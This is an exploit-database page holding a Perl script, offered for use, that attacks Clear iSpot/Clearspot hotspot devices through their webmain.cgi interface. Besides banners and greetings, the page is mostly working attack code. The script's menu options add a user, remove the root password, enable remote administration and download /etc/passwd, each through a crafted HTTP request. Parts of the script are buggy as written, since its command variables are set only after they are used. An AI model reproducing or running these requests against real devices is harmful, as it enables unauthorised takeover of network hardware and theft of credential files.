Clear (iSpot/Clearspot) Remote Command Execution Exploit



EKU-ID: 191 CVE: OSVDB-ID:
Author: KedAns-Dz Published: 2011-05-09 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

#!/usr/bin/perl
system("cls");
sub logo(){
print q'
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
1                      ______                                          0
0                   .-"      "-.                                       1
1                  / KedAns-Dz  \ =-=-=-=-=-=-=-=-=-=-=-|              0
0 Algerian HaCker |              | > Site : 1337day.com |              1
1 --------------- |,  .-.  .-.  ,| > Twitter : @kedans  |              0
0                 | )(_o/  \o_)( | > ked-h@hotmail.com  |              1
1                 |/     /\     \| =-=-=-=-=-=-=-=-=-=-=|              0
0       (@_       (_     ^^     _)  HaCkerS-StreeT-Team                1
1  _     ) \_______\__|IIIIII|__/_______________________               0
0 (_)@8@8{}<________|-\IIIIII/-|________________________>              1
1        )_/        \          /                                       0
0       (@           `--------` © 2011, Inj3ct0r Team                  1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
0      Clear (iSpot/Clearspot) Reomte Command Execution Exploit        1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
';
}
###
# Title : Clear (iSpot/Clearspot) Remote Command Execution Exploit
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Web Site : www.1337day.com / exploit-id.com
# Twitter page : twitter.com/kedans
# platform : hardware
# Impact : Remote Command Execution
##
# Real Bug : (http://exploit-db.com/exploits/15728) << By Trustwave's SpiderLabs
###
logo();
print "\n [*] Usage: $0 127.0.0.1\n\n";
print " [!] Command : 1 = Add New User \n";
print " [!] Command : 2 = Remove root password \n";
print " [!] Command : 3 = Enable remote administration access \n";
print " [!] Command : 4 = Download /etc/passwd file \n";
$ARGC=@ARGV;
if ($ARGC!=1) {
   print "\n [*] f.ex: $0 41.126.3.1\n\n";
   exit(0);  
}
use LWP::Simple;
use LWP::UserAgent;
my $target = shift;
print "\n [+] Command : ";
$cmd = <stdin>;
print " ~~~~~~~~~~~~~~~\n";
  if ($cmd eq "1") {
    $CMD = $act1;
  } elsif ($cmd eq "2") {
    $CMD = $act2;
  } elsif ($cmd eq "3") {
    $CMD = $act3;
  } elsif ($cmd eq "4") {
    $CMD = $act4;
  }
$act1 = "cgi-bin/webmain.cgi?act=act_cmd_result&cmd=adduser%20-S%20kedans";
$act2 = "cgi-bin/webmain.cgi?act=act_cmd_result&cmd=passwd%20-d%20root";
$act3 = "cgi-bin/webmain.cgi?act=act_network_set&enable_remote_access=YES&remote_access_port=80";
$act4 = "cgi-bin/webmain.cgi?act=upgrademain.cgi?act=act_file_download&METHOD=PATH&FILE_PATH=/etc/passwd";
$attack = get("http://" .$target. "/" .$CMD);
print "\n [+] Execute the Command ...\n\n";
if ( $attack =~ /<cmdout>(.*)<\/cmdout>/)
    {
    print " [+] Successfully Executed $cmd \n\n";
    exit;
 }else
     {
     print " [-] Couldnt Execute Command $cmd \n";
  exit;
  }
sleep(1000);

#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================================== 
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix *
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ ....
# Exploit-Id Team : jos_ali_joe + Caddy-Dz (exploit-id.com) ... All Others * TreX (hotturks.org)
# JaGo-Dz (sec4ever.com) * KelvinX (kelvinx.net) * PaCketStorm Team (www.packetstormsecurity.org)
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
#================================================================================================